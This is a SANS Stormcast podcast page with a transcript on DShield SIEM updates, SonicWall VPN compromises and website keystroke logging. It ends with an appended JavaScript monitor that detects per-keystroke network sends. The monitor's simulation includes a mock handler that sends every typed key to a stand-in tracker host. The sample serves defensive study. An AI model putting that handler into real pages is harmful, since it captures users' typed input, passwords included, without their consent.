
SANS Stormcast Friday, September 12th, 2025: DShield SIEM Update; Another Sonicwall Warning; Website Keystroke Logging

Direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9610.mp3

DShield SIEM Update; Another Sonicwall Warning; Website Keystroke Logging

DShield SIEM Docker Updates
Guy updated the “DShield SIEM” which graphically summarizes what is happening inside your honeypot.
https://isc.sans.edu/diary/DShield%20SIEM%20Docker%20Updates/32276

Again: Sonicwall SSL VPN Compromises
The Australian Government’s Signals Directorate noted an increase in compromised Sonicwall devices.
https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/ongoing-active-exploitation-of-sonicwall-ssl-vpns-in-australia

Website Keystroke Logging
Many websites log every keystroke, not just data submitted in forms.
https://arxiv.org/pdf/2508.19825

Podcast Transcript

Hello and welcome to the Friday, September 12, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu undergraduate certificate program in cybersecurity fundamentals.

Today's diary is an update from Guy about the DShield SIEM that Guy maintains, and actually he created it as well. One of the great things about running a honeypot is awareness about all the attacks that your network may be exposed to. This SIEM provides you with a really pretty graphical user interface summarizing the attacks that are hitting your honeypot and allowing you to eventually dig into the data more easily without having to break out your command line skills. And just the visualization itself is pretty nice and also provides quite a bit of value, I think, in particular to better understand how the attacks are breaking down. There are geographic maps that you can look at. There are various sort of port statistics and such that are being summarized here. Now, the nice thing about this SIEM is that it's actually entirely inside Docker containers, and that makes it really easy to update. You essentially just remove the old Docker containers and then create new ones, and you are up to date. So if you're using this tool, well, take a look at it. If you're not using it, well, take a look at it and see if you like it. It does require a little bit more processing power than you usually have, like on the basic Raspberry Pis. But if you are running your honeypot inside a virtual machine or on a little bit more powerful system, it'll certainly work. It uses ELK: Elasticsearch, Logstash, Kibana, and those familiar with these tools will also recognize the overall UI that is presented by this SIEM.

And yes, it's becoming sort of a recurring theme here that we have government agencies. Today, it's the Australian Government's Signals Directorate noticing an increase in attacks against SonicWall SSL VPNs. They're linking it to an older, last year's vulnerability. The big problem with all of these compromises is somewhat twofold. First of all, of course, some devices still aren't being patched. And the second one, that's a little bit the more tricky one, is that devices are patched, but at the time they were patched, they were already compromised. The attackers either left back doors behind, they added additional accounts, they stole credentials. So it's really important, if you're patching these devices, don't just blindly patch. In particular, if this is not a super new vulnerability, like it's maybe a month old or so, assume compromise. Change credentials, change passwords, change SSH keys, change seeds for two-factor authentication. And definitely do a quick review of what users are on the system, any odd binaries. Without at least some rudimentary incident response here, you're risking that the device has already been compromised, and really, patching it is usually not going to evict the attacker.

And a number of researchers from the US and Europe have collaborated to do a larger study on the use of keystroke detection in JavaScript on various websites. What happens here is that the websites include JavaScript that will basically record any keystroke while you're using the site. So even before you submit a particular form, the website may receive anything that you type, including things that you may then later delete before submitting a form. Now, sometimes this kind of code is being added as more something like a CAPTCHA, where they want to detect whether or not it's actually a human typing the text. Sometimes sort of for simple copy-paste protection, which is an entirely different story. But of course, the big problem here is that, let's say, you start typing your password by mistake into a username field or such. And even before submitting that password, well, that password has already been sent to the respective websites. So there's a real privacy risk here. As a little side note to this, I recently had a student here at sans.edu write a paper about some of these tracking technologies, not just JavaScript based, but also others like canvas-based and such, and comparing malicious and non-malicious websites. And well, the sad truth is that malicious and non-malicious websites use exactly the same techniques at pretty much exactly the same prevalence. As a user, there's not much you can do to protect yourself here. Sometimes it's interesting to observe the network requests in your browser's developer tools. You can sometimes see what's happening there. But just be aware that this is happening. Be careful how you type, what you type, and assume that anything that you type into a particular website is being transmitted to the website, even if you don't explicitly click submit.

Well, and that's it for today. Thanks again for listening. Thanks for subscribing and liking this podcast. Did I miss a story that I should have covered? Well, please send me links to stories. Also, if you discovered something yourself, if you wrote an interesting paper, I'm always interested to hear from authors, not so much from marketing departments and the like. But anyway, that's it for today. Thanks for listening and talk to you again on Monday. Bye.
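The keystroke-logging story above describes the one observable difference between the two behaviours: a page that transmits as you type fires a request right after each key, while a normal form only sends when you submit. The following is an added example, not code from the podcast, the ISC, or the arXiv paper it cites. It is a small DevTools-style monitor that wraps a transport object and flags any outbound send that closely follows a keydown. The names `doc` (any EventTarget; `document` in a browser) and `net` (any object exposing `send(url, body)`, which in a browser would wrap `navigator.sendBeacon` or `fetch`) and the 200 ms window are assumptions of this example, chosen so the same code runs offline under Node against a constructed page simulation.

```javascript
// Added example (not from the podcast or the cited paper): flag outbound requests
// that fire right after a keystroke, the signature of per-keystroke transmission.
// "doc" is any EventTarget (document in a browser); "net" is any object with
// send(url, body) (in a browser, a wrapper around navigator.sendBeacon / fetch).
// Both names and the 200 ms window are assumptions of this example.

function createKeystrokeExfilMonitor(doc, net, { windowMs = 200, now = () => Date.now() } = {}) {
  const findings = [];
  let lastKeyAt = -Infinity;

  // Remember when the last key went down. Capture phase so that, in a browser,
  // this listener runs before the page's own bubble-phase keydown handlers.
  doc.addEventListener('keydown', () => { lastKeyAt = now(); }, true);

  // Wrap the transport: any send that closely follows a keystroke gets recorded.
  const originalSend = net.send.bind(net);
  net.send = (url, body) => {
    const msAfterKey = now() - lastKeyAt;
    if (msAfterKey <= windowMs) findings.push({ url, body: String(body), msAfterKey });
    return originalSend(url, body);
  };

  return { findings };
}

// Constructed simulation: a page with a per-keystroke logger plus a normal
// form submit, so the monitor's output can be checked without a browser.
function simulatePage() {
  let clock = 0;                                   // manual clock in milliseconds
  const doc = new EventTarget();                   // stands in for document
  const sent = [];                                 // everything the "network" saw
  const net = { send(url, body) { sent.push({ url, body }); return true; } };

  // Install the monitor first so its keydown listener runs before the page script.
  const monitor = createKeystrokeExfilMonitor(doc, net, { now: () => clock });

  // The page's own tracking script (simulated): transmit each key as it is typed.
  doc.addEventListener('keydown', (e) => {
    net.send('https://tracker.example/k', JSON.stringify({ key: e.key }));
  });

  // The user types three characters, 50 ms apart.
  for (const key of ['p', 'a', 's']) {
    clock += 50;
    doc.dispatchEvent(Object.assign(new Event('keydown'), { key }));
  }

  // One second later the form is submitted; this send is ordinary submit-time traffic.
  clock += 1000;
  net.send('https://site.example/login', 'user=p&pw=as');

  return { flagged: monitor.findings, totalSends: sent.length };
}

// Stand-alone run (node file.js): print what the monitor would flag.
if (typeof require !== 'undefined' && require.main === module) {
  for (const f of simulatePage().flagged) {
    console.log(`flagged ${f.url} ${f.msAfterKey} ms after a key: ${f.body}`);
  }
}
```

In the simulation the three per-key sends are flagged and the submit is not, which is exactly the distinction a user looking at the network panel would want to draw. In a real browser you would install the wrapper around `navigator.sendBeacon` and `window.fetch` from the console after the page has loaded; the capture-phase listener then still sees each key before the page's own handlers run.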